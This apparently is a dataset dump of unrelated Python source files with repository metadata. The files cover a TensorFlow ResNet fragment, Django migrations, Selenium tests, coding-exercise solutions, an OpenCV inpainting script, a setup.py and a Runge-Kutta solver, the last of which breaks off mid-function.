res3c = tf.nn.relu(res3b+branch2, 'relu')
with tf.variable_scope('res3d'):
branch2 = self._res_branch(
res3c, layer_name='3d', in_filters=128, out_filters=512,
down_sample=False, freeze=True)
res3d = tf.nn.relu(res3c+branch2, 'relu')
with tf.variable_scope('conv4_x') as scope:
with tf.variable_scope('res4a'):
branch1 = self._conv_bn_layer(
res3d, 'res4a_branch1', 'bn4a_branch1', 'scale4a_branch1',
filters=1024, size=1, stride=2, relu=False)
branch2 = self._res_branch(
res3d, layer_name='4a', in_filters=256, out_filters=1024,
down_sample=True)
res4a = tf.nn.relu(branch1+branch2, 'relu')
with tf.variable_scope('res4b'):
branch2 = self._res_branch(
res4a, layer_name='4b', in_filters=256, out_filters=1024,
down_sample=False)
res4b = tf.nn.relu(res4a+branch2, 'relu')
with tf.variable_scope('res4c'):
branch2 = self._res_branch(
res4b, layer_name='4c', in_filters=256, out_filters=1024,
down_sample=False)
res4c = tf.nn.relu(res4b+branch2, 'relu')
with tf.variable_scope('res4d'):
branch2 = self._res_branch(
res4c, layer_name='4d', in_filters=256, out_filters=1024,
down_sample=False)
res4d = tf.nn.relu(res4c+branch2, 'relu')
with tf.variable_scope('res4e'):
branch2 = self._res_branch(
res4d, layer_name='4e', in_filters=256, out_filters=1024,
down_sample=False)
res4e = tf.nn.relu(res4d+branch2, 'relu')
with tf.variable_scope('res4f'):
branch2 = self._res_branch(
res4e, layer_name='4f', in_filters=256, out_filters=1024,
down_sample=False)
res4f = tf.nn.relu(res4e+branch2, 'relu')
dropout4 = tf.nn.dropout(res4f, self.keep_prob, name='drop4')
num_output = mc.ANCHOR_PER_GRID * (mc.CLASSES + 1 + 4)
self.preds = self._conv_layer(
'conv5', dropout4, filters=num_output, size=3, stride=1,
padding='SAME', xavier=False, relu=False, stddev=0.0001)
def _res_branch(
self, inputs, layer_name, in_filters, out_filters, down_sample=False,
freeze=False):
"""Residual branch constructor.
Args:
inputs: input tensor
layer_name: layer name
in_filters: number of filters in XX_branch2a and XX_branch2b layers.
      out_filters: number of filters in XX_branch2c layers.
      down_sample: if true, down sample the input feature map
freeze: if true, do not change parameters in this layer
Returns:
A residual branch output operation.
"""
with tf.variable_scope('res'+layer_name+'_branch2'):
stride = 2 if down_sample else 1
output = self._conv_bn_layer(
inputs,
conv_param_name='res'+layer_name+'_branch2a',
bn_param_name='bn'+layer_name+'_branch2a',
scale_param_name='scale'+layer_name+'_branch2a',
filters=in_filters, size=1, stride=stride, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2b',
bn_param_name='bn'+layer_name+'_branch2b',
scale_param_name='scale'+layer_name+'_branch2b',
filters=in_filters, size=3, stride=1, freeze=freeze)
output = self._conv_bn_layer(
output,
conv_param_name='res'+layer_name+'_branch2c',
bn_param_name='bn'+layer_name+'_branch2c',
scale_param_name='scale'+layer_name+'_branch2c',
filters=out_filters, size=1, stride=1, freeze=freeze, relu=False)
return output
| [
"[email protected]"
] | |
7fa896bdd5e866fa37b79413b77428eca5f260da | 8a1144dd38388992c7e35a4cc84002e381f2cf1f | /python/django_fundamentals/main3/apps/third_app/models.py | ef165f7feabe4f6b980f5a16ea9002f10e11ff54 | [] | no_license | vin792/dojo_assignments | 18472e868610bacbd0b5141a5322628f4afefb5b | 449b752f92df224285bfd5d03901a3692a98562e | refs/heads/master | 2021-01-20T00:20:09.896742 | 2017-05-26T17:37:09 | 2017-05-26T17:37:09 | 82,735,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class People(models.Model):
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length= 30)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True) | [
"[email protected]"
] | |
ba298290ffb40d5dda804815a82833564aff7427 | 73036231277447340ce6ac8cf08fa5aab9772778 | /libreria/libreria/static/img/django-cities-light-2.0.7/django-cities-light-2.0.7/cities_light/migrations/0012_set_display_name.py | e74659676bac3c57ec48aeec83ee56f96928836b | [
"MIT"
] | permissive | jesusmaherrera/books_library | 68f23e2352644df66f92d9e37baf274486984bed | c621f86aa2f8000c13371aea2b000a9bd8965fa1 | refs/heads/master | 2021-01-13T02:06:24.579310 | 2013-02-06T03:21:16 | 2013-02-06T03:21:16 | 5,944,653 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,926 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for region in orm['cities_light.Region'].objects.all():
region.display_name = u'%s, %s' % (
region.name, region.country.name)
region.save()
for city in orm['cities_light.City'].objects.all():
if city.region_id:
city.display_name = u'%s, %s, %s' % (
city.name, city.region.name, city.country.name)
else:
city.display_name = u'%s, %s' % (
city.name, city.country.name)
city.save()
def backwards(self, orm):
"Write your backwards methods here."
models = {
'cities_light.city': {
'Meta': {'unique_together': "(('region', 'name'),)", 'object_name': 'City'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Region']", 'null': 'True'}),
'search_names': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '4000', 'db_index': 'True', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
},
'cities_light.country': {
'Meta': {'object_name': 'Country'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'}),
'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
},
'cities_light.region': {
'Meta': {'unique_together': "(('country', 'name'),)", 'object_name': 'Region'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
}
}
complete_apps = ['cities_light']
symmetrical = True
| [
"[email protected]"
] | |
7aaaf55396fa42efe3b6ca2c9c2de6dd06a030d0 | 95a6555114011d7ba9b0a842dd348dc4a18a56fc | /utils/register_user.py | f825ea8fd83e3071a42ff655b47e64950ed36251 | [
"Unlicense"
] | permissive | battyone/ParaBankSeleniumAutomation | c96dfdcb11591dd12db31b7ddd373326ce4284f7 | e28a886adba89b82a60831ad96a3a8f00f863116 | refs/heads/master | 2023-05-04T19:58:13.067568 | 2020-03-15T17:19:09 | 2020-03-15T17:19:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
import time
import allure
from utils.open_web_browser import open_web_browser
from page_object_models.register_page_model import RegisterPageModel
from expected_results.page_content.register_page_content import RegisterPageContent
from utils.step_definition import step_definition
def register_user(user, config):
'''
Registers a new user.
Does not check for any errors.
Using Selenium webdriver + chrome browser by default
    :param user: user object carrying the registration form data
    :param config: configuration used to open the web browser
    :return:
'''
page_model = RegisterPageModel
page_context = RegisterPageContent
print("\nUser registration procedure...")
print("\n1. Open web browser...")
page = open_web_browser(config=config,
page_model=page_model,
page_content=page_context)
with allure.step("Fill out Register web form"):
print("\n2. Filling out user data...")
page.type_first_name(user.first_name)
page.type_last_name(user.last_name)
page.type_address(user.address)
page.type_city(user.city)
page.type_state(user.state)
page.type_zip_code(user.zip_code)
page.type_phone(user.phone)
page.type_ssn(user.ssn)
page.type_username(user.username)
page.type_password(user.password)
page.type_confirm(user.password)
with allure.step("Hit 'REGISTER' button"):
print("\n3. Hit 'REGISTER' button...")
page.hit_register_btn()
time.sleep(3)
with allure.step("Verify \"Welcome\" message"):
print('Verify "Welcome" message...')
expected = RegisterPageContent.WELCOME_MESSAGE['message']
actual = page.welcome_message
if expected == actual:
print("OK: Welcome message detected")
else:
print("ERROR: Welcome message does not appear")
with allure.step("Do Log Out"):
print("\n4. Do Log Out...")
page.hit_log_out_button()
time.sleep(3)
with allure.step("Close web browser"):
print("\n5. Close web browser...")
page.quit()
| [
"[email protected]"
] | |
28ee36dd6ff812fe4e277bd07efe81507c608c41 | 836d5f7190f6b4503e758c87c71598f18fdfce14 | /5-Döngüler/While-Döngüsü.py | 1ac3301b95952b419549dd7879fcf6fe5c4abac3 | [] | no_license | S-Oktay-Bicici/PYTHON-PROGRAMMING | cf452723fd3e7e8ec2aadc7980208d747c502e9a | 22e864f89544249d6309d6f4570a4104bf47346b | refs/heads/main | 2021-11-30T00:19:21.158084 | 2021-11-16T15:44:29 | 2021-11-16T15:44:29 | 316,716,147 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py |
############################################################
x = 0
while x <= 0:
print("doğru")
x += 1
print("x in değeri: ",x)
############################################################
a = 0
while a < 100:
a += 1
if a % 2 == 0:
print(a)
#############################################################
tr_harfler = "şçöğüİı"
a = 0
while a < len(tr_harfler):
    print(tr_harfler[a], end=" ")  # end=" " keeps the letters on one line; sep has no effect with a single argument
a += 1
| [
"[email protected]"
] | |
561ae3faab88aca8acbdbe2023956a6b79a78cee | d40c743378c754b822bc42cfa7ede73792a31ede | /sales_by_march.py | a56fafb7ead4dc2b25d6515180e7eb7d8368db7d | [] | no_license | ShanjinurIslam/HackerRank | 85127527be319c3f1822c359a5831e4bcce25e8f | 38d77f2d0f56a6cec4bd544b347ee53d829dc715 | refs/heads/master | 2023-02-05T04:28:11.285169 | 2020-12-27T11:21:09 | 2020-12-27T11:21:09 | 320,749,069 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
hash_map = defaultdict(int)
for each in ar:
hash_map[each] += 1
total = 0
for each in hash_map.keys():
total += hash_map[each]//2
return total
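# Quick sanity check (illustrative): sockMerchant(9, [10, 20, 20, 10, 10, 30, 50, 10, 20])
# returns 3 -- two pairs of 10s and one pair of 20s.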
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
ar = list(map(int, input().rstrip().split()))
result = sockMerchant(n, ar)
fptr.write(str(result) + '\n')
fptr.close()
| [
"[email protected]"
] | |
a8b5085e4e8dbff770b58197257f4b8f7f0cdc50 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-apigee-registry/samples/generated_samples/apigeeregistry_v1_generated_registry_get_artifact_sync.py | 0dbb7b9b471b59e7bc0cd633cdcb3a7389126fc1 | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 1,845 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetArtifact
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-apigee-registry
# [START apigeeregistry_v1_generated_Registry_GetArtifact_sync]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import apigee_registry_v1
def sample_get_artifact():
# Create a client
client = apigee_registry_v1.RegistryClient()
# Initialize request argument(s)
request = apigee_registry_v1.GetArtifactRequest(
name="name_value",
)
# Make the request
response = client.get_artifact(request=request)
# Handle the response
print(response)
# [END apigeeregistry_v1_generated_Registry_GetArtifact_sync]
| [
"[email protected]"
] | |
b4d9ec0b78a5f819546da52b89aaac8c78b7f8a7 | 21c1edbdb863158ed812031c6d63a40ba3bea31f | /simple/1_player/deep_crossentropy.py | bc72f2f610a42d5a302bebe5698aba4cc9692484 | [] | no_license | Ollitros/Tic-tac-toe | 22ebe26bc709f3c16210783b7411ee77c4df8aa7 | b551e1f60d8cbfc7167c057553dff897e34c7093 | refs/heads/master | 2020-03-29T22:00:53.037694 | 2019-05-01T17:02:09 | 2019-05-01T17:02:09 | 150,398,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,173 | py | from sklearn.neural_network import MLPClassifier
import numpy as np
import matplotlib.pyplot as plt
from tic_tac_toe.simple_tic_tac_toe import TicTacToe
def show_progress(batch_rewards, log, percentile, reward_range=[-990, +100]):
"""
A convenience function that displays training progress.
No cool math here, just charts.
"""
mean_reward, threshold = np.mean(batch_rewards), np.percentile(batch_rewards, percentile)
log.append([mean_reward, threshold])
print("mean reward = %.3f, threshold=%.3f" % (mean_reward, threshold))
plt.figure(figsize=[8, 4])
plt.subplot(1, 2, 1)
plt.plot(list(zip(*log))[0], label='Mean rewards')
plt.plot(list(zip(*log))[1], label='Reward thresholds')
plt.legend()
plt.grid()
plt.subplot(1, 2, 2)
plt.hist(batch_rewards, range=reward_range)
plt.vlines([np.percentile(batch_rewards, percentile)], [0], [100], label="percentile", color='red')
plt.legend()
plt.grid()
plt.show()
def select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
"""
Select states and actions from games that have rewards >= percentile
:param states_batch: list of lists of states, states_batch[session_i][t]
:param actions_batch: list of lists of actions, actions_batch[session_i][t]
:param rewards_batch: list of rewards, rewards_batch[session_i][t]
:returns: elite_states,elite_actions, both 1D lists of states and respective actions from elite sessions
Please return elite states and actions in their original order
[i.e. sorted by session number and timestep within session]
    If you're confused, see the example below. Please don't assume that states are integers (they'll be of a different type later).
"""
reward_threshold = np.percentile(rewards_batch, percentile)
elite_states = [s for i in range(len(states_batch)) if rewards_batch[i] >= reward_threshold for s in
states_batch[i]]
elite_actions = [a for i in range(len(actions_batch)) if rewards_batch[i] >= reward_threshold for a in
actions_batch[i]]
return elite_states, elite_actions
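# Example referenced by the docstring above (illustrative): with rewards
# [1, 10] and percentile=50 the threshold is 5.5, so only the second session
# survives:
#   select_elites([[0, 1], [2]], [[3, 4], [5]], [1, 10], percentile=50)
#   -> ([2], [5])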
def generate_session(t_max=1000):
states, actions = [], []
total_reward = 0
s = env.reset()
print("State-reset: ", s)
for t in range(t_max):
print("\nStep inside step - ", t)
# a vector of action probabilities in current state
probs = agent.predict_proba([s])[0]
print("Probs: ", probs)
a = np.random.choice(n_actions, 1, p=probs)[0]
print("Action:", a)
        # skip moves into cells that are already occupied on the board
        board = env.states
        if board[a] == 1:
            continue
new_s, r, done = env.step(a, 1)
# record sessions like you did before
states.append(s)
actions.append(a)
total_reward += r
s = new_s
print("new_state - ", new_s)
print("r = ", r)
if done:
break
return states, actions, total_reward
env = TicTacToe()
env.reset()
n_actions = env.n
print("Actions: \n", env.actions)
print("Total number of actions: ", n_actions)
agent = MLPClassifier(hidden_layer_sizes=(20, 20),
activation='tanh',
warm_start=True,
                      max_iter=1  # make only 1 iteration on each .fit(...)
)
# initialize agent to the dimension of state an amount of actions
print([env.reset()]*n_actions)
agent.fit([env.reset()]*n_actions, range(n_actions))
n_sessions = 100
percentile = 70
log = []
for i in range(50):
print('\n\n\n !!! STEP - ', i+1)
# generate new sessions
sessions = [generate_session() for i in range(n_sessions)]
batch_states, batch_actions, batch_rewards = map(np.array, zip(*sessions))
elite_states, elite_actions = select_elites(batch_states, batch_actions, batch_rewards, percentile)
# print(elite_states[:3])
# print(elite_actions[:3])
agent.fit(elite_states, elite_actions)
show_progress(batch_rewards, log, percentile, reward_range=[0, np.max(batch_rewards)])
if np.mean(batch_rewards) > 50:
print("You Win! You may stop training now via KeyboardInterrupt.")
| [
"[email protected]"
] | |
2f13a478783bf8420e554f05869dea7277b04405 | 44fc88370e7dd01aab918aa797983c5051f4147e | /Controllers/TestThread.py | eb4dc07460106b86c8a16d0ffce941059358f7c6 | [] | no_license | Sispheor/PiHomeAlone | 1f1a9aa619b97483a61972b58094c6cec961161a | 7356adddc0e936b8c8f6bd45813ec012196edefd | refs/heads/master | 2021-01-15T16:57:20.813213 | 2016-08-31T20:14:02 | 2016-08-31T20:14:02 | 64,602,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 369 | py | import threading
class TestThread(threading.Thread):
def __init__(self, shared_queue):
super(TestThread, self).__init__()
self.shared_queue = shared_queue
def run(self):
print "Run test thread"
        # busy-wait loop: poll the shared queue and print whatever arrives
        while True:
if not self.shared_queue.empty():
val = self.shared_queue.get()
print val
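# Minimal usage sketch (illustrative, Python 2 to match the prints above):
# feed the shared queue from the main thread and let TestThread echo it.
if __name__ == '__main__':
    import Queue
    import time
    q = Queue.Queue()
    t = TestThread(q)
    t.daemon = True  # let the demo exit despite run()'s infinite loop
    t.start()
    q.put('hello')
    time.sleep(0.1)  # give the worker a moment to print 'hello'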
| [
"[email protected]"
] | |
fa320868ae9bf5f750b0b8459e690b5b188e5164 | 82c4d0e905bf28fecbad33274cc5aac9c1bdde99 | /thinger.py | 813ac23fd871fce607528cb066dc481b2a5a7e83 | [] | no_license | dansgithubuser/py-rpc-host | aac578d9410a056a7751c6eae648d924fa4a3a2d | e4d19e02e427784e21cf267692539523f034d8f9 | refs/heads/master | 2020-05-18T03:03:52.661094 | 2020-02-07T23:30:51 | 2020-02-07T23:36:22 | 184,135,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13 | py | blinger = 24
| [
"[email protected]"
] | |
a3e1e62573d08a5efcf9b3c114322ce3211071fb | 4e23ff457c737886d3f1280162b90987bbc12211 | /main/apps/carts/migrations/0003_auto_20190120_0337.py | bd278830f6b8cdc994bdb5beb3c617c35c70510e | [] | no_license | ehoversten/Ecommerce_Django | 8ab1edeb1b7ed2a0e9f33920ecccc2d6b1996cd9 | b109b62e2fd318c4feb37c448898cbeada722968 | refs/heads/master | 2022-12-21T09:42:53.317891 | 2019-02-14T16:24:00 | 2019-02-14T16:24:00 | 143,313,907 | 6 | 2 | null | 2022-11-22T02:34:42 | 2018-08-02T15:34:32 | Python | UTF-8 | Python | false | false | 660 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-01-20 03:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carts', '0002_cart_subtotal'),
]
operations = [
migrations.AlterField(
model_name='cart',
name='subtotal',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
migrations.AlterField(
model_name='cart',
name='total',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
]
| [
"[email protected]"
] | |
c40022197521b3fda780acbc6aeb293021154248 | fa1eb33b885bd03a56a542720c4f823654457bd5 | /tests/test_image_search.py | b4169a9b82cd7fb74be11c9f5050def5e6b7800c | [] | no_license | jhoover4/fcc-api-projects | 16753435017518c0594db9ead3606691280fadc4 | b21f830c0f1047e0cb28f71387de4581cd4be523 | refs/heads/master | 2022-12-11T03:44:22.103645 | 2018-12-26T19:24:13 | 2018-12-26T19:25:52 | 118,831,587 | 0 | 0 | null | 2022-12-08T01:26:31 | 2018-01-24T22:44:09 | Python | UTF-8 | Python | false | false | 2,433 | py | import datetime
import json
import unittest
from test_app import BaseTestCase
import models
class TestImageSearchView(BaseTestCase, unittest.TestCase):
def test_check_table(self):
assert models.ImageSearch.table_exists()
def test_index(self):
"""Test that the description view for this api is running."""
url = self.app.get('/image-search')
self.assertTrue(url.data)
self.assertEqual(url.status_code, 200)
class TestImageSearchApi(BaseTestCase, unittest.TestCase):
def setUp(self):
super().setUp()
self.search_record = models.ImageSearch.create(search_query='cats')
def test_new_search(self):
"""Test search is performed correctly and returns json data."""
response = self.app.get('/api/image-search/cats')
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_search_offset(self):
"""Test search is performed correctly with offset parameter"""
response = self.app.get('/api/image-search/cats')
offset_response = self.app.get('/api/image-search/cats', query_string={'offset': 15})
self.assertEqual(offset_response.status_code, 200)
self.assertNotEqual(offset_response.json[0]['formattedUrl'], response.json[0]['formattedUrl'])
def test_new_query_in_args(self):
"""Test search is performed with query in parameters."""
response = self.app.get('/api/image-search', query_string={'query': 'cats'})
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_query_in_args_empty(self):
"""Test error is thrown if query not in url at all."""
response = self.app.get('/api/image-search')
self.assertEqual(response.status_code, 400)
self.assertEqual(json.loads(response.data), {
'message': 'Query is required.'
})
def test_recent_searches(self):
"""Test all searches are returned on GET."""
response = self.app.get('/api/image-search/recent')
expected_data = [{
'query': self.search_record.search_query,
'when': datetime.datetime.strftime(self.search_record.created_at, '%a, %d %b %Y %X -0000')
}]
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data), expected_data)
| [
"[email protected]"
] | |
c253640dbc26eb41517006f2f80be5e9f19b2aaf | 2e9748e6dc278a5a84184216d94ab2c841ec8482 | /image_process/opencv/noise_remove_inpaint/main.py | 17a39c66a3aa56f6b191aaa81377d6ade7690a95 | [
"MIT"
] | permissive | ybdesire/machinelearning | fa2bc20240e88513475358c761d067108e1eadf8 | 0224746332e1085336e0b02e0ca3b11d74bd9a91 | refs/heads/master | 2021-12-08T04:46:56.344543 | 2021-11-19T07:57:47 | 2021-11-19T07:57:47 | 54,877,464 | 30 | 19 | null | 2021-08-13T01:23:08 | 2016-03-28T08:16:06 | Jupyter Notebook | UTF-8 | Python | false | false | 208 | py | import numpy as np
import cv2 as cv
# image to restore, plus a mask whose non-zero pixels mark the damaged area
img = cv.imread('messi.png')
mask = cv.imread('mask.png', 0)  # 0 = load as grayscale
# fill the masked region using Telea's inpainting with a 3-pixel radius
dst = cv.inpaint(img, mask, 3, cv.INPAINT_TELEA)
cv.imshow('dst',dst)
cv.waitKey(0)
cv.destroyAllWindows()
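# Sketch (assumption: the damage shows up as bright scribbles): a mask can
# also be derived from the image itself instead of a separate file, e.g.
#   gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
#   _, mask = cv.threshold(gray, 245, 255, cv.THRESH_BINARY)
# Non-zero mask pixels mark the region that cv.inpaint will fill.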
| [
"[email protected]"
] | |
129f9191f2f84ac88110b03e3dcf1e00a852b049 | 3c92c3f633b613a62fb67476fd617e1140133880 | /leetcode/605. Can Place Flowers.py | db797a8c9e9dcebc16f5082e85a622b0163ba516 | [] | no_license | cuiy0006/Algorithms | 2787f36f8164ded5252a006f723b570c9091bee9 | 00fd1397b65c68a303fcf963db3e28cd35c1c003 | refs/heads/master | 2023-03-31T13:55:59.191857 | 2023-03-31T03:39:42 | 2023-03-31T03:39:42 | 75,001,651 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | class Solution:
    # annotation quoted so the file runs standalone; LeetCode normally
    # pre-imports typing.List
    def canPlaceFlowers(self, flowerbed: 'List[int]', n: int) -> bool:
if n == 0:
return True
for i, plot in enumerate(flowerbed):
if plot == 1:
continue
if (i == 0 or flowerbed[i - 1] == 0) and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0):
flowerbed[i] = 1
n -= 1
if n == 0:
return True
return False
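# Minimal usage sketch (illustrative): the problem's classic example --
# one more flower fits in [1,0,0,0,1], but two do not.
if __name__ == '__main__':
    print(Solution().canPlaceFlowers([1, 0, 0, 0, 1], 1))  # True
    print(Solution().canPlaceFlowers([1, 0, 0, 0, 1], 2))  # False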
| [
"[email protected]"
] | |
757c41f50ce3426d0abb28b4e32a9f738da56736 | 6573a45c4389688666821621c26a5a95a0765e4d | /archived_envs/20190625_100746/bin/iptest2 | 6e74f0fe49439610cf8c38536be2e444eeba223e | [] | no_license | ilhmndn/Warehouse-Management-System-With-Frappe | 66a41be2286dbdb556ab51a4788fc42987d6ed2e | bd9864c5a04a6e2f2f625a8755fba3df4b6409be | refs/heads/master | 2022-10-23T11:13:57.810948 | 2019-07-02T05:18:19 | 2019-07-02T05:18:19 | 194,467,571 | 2 | 2 | null | 2022-10-15T16:16:10 | 2019-06-30T02:40:05 | Python | UTF-8 | Python | false | false | 262 | #!/home/ilhmndn/frappe-training/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython.testing.iptestcontroller import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
f68d2ca23b8e9660445df4f664adf81a10a1b580 | dd6a3615d54ca825051f1c9f81bcd206eb9cfd10 | /setup.py | 91bcc6ec95068bd0fb034196004e350c1d121a19 | [
"MIT"
] | permissive | cherakhan/mps | 82e06aea229b2047bf1be68c4430fad621189abf | 2ba818c361e467841f6bbe0ef47a1e833ef315d3 | refs/heads/master | 2022-02-01T20:40:07.327357 | 2019-06-10T03:43:49 | 2019-06-10T03:43:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/env python
import os
from setuptools import find_packages
with open('README.md', 'r') as f:
LONG_DESCRIPTION = f.read()
from numpy.distutils.core import setup, Extension
setup_options = dict(
name='doe-mps',
version="0.1.1",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url='https://github.com/kirthevasank/mps/',
license='MIT',
author_email='[email protected]',
packages=['mps', 'mps.exd', 'mps.policies', 'mps.utils', 'mps.prob'],
install_requires=[
'future',
'numpy',
'scipy',
'six',
],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX :: Linux",
"Operating System :: Unix",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
setup(**setup_options)
| [
"[email protected]"
] | |
d2fb24dfd527c8ee0ac66cd54930611e44b3d5c6 | 34652a47355a8dbe9200db229a1bbc62619de364 | /Maths/diff_eqns/Runge_Kutta_method_2.py | 98e189db514dbf1126d73f217e5d7515b190d817 | [] | no_license | btrif/Python_dev_repo | df34ab7066eab662a5c11467d390e067ab5bf0f8 | b4c81010a1476721cabc2621b17d92fead9314b4 | refs/heads/master | 2020-04-02T13:34:11.655162 | 2019-11-10T11:08:23 | 2019-11-10T11:08:23 | 154,487,015 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | def rKN(x, fx, n, hs):
k1 = []
k2 = []
k3 = []
k4 = []
xk = []
for i in range(n):
k1.append(fx[i](x)*hs)
for i in range(n):
xk.append(x[i] + k1[i]*0.5)
for i in range(n):
k2.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k2[i]*0.5
for i in range(n):
k3.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k3[i]
for i in range(n):
k4.append(fx[i](xk)*hs)
for i in range(n):
x[i] = x[i] + (k1[i] + 2*(k2[i] + k3[i]) + k4[i])/6
return x
def fa1(x):
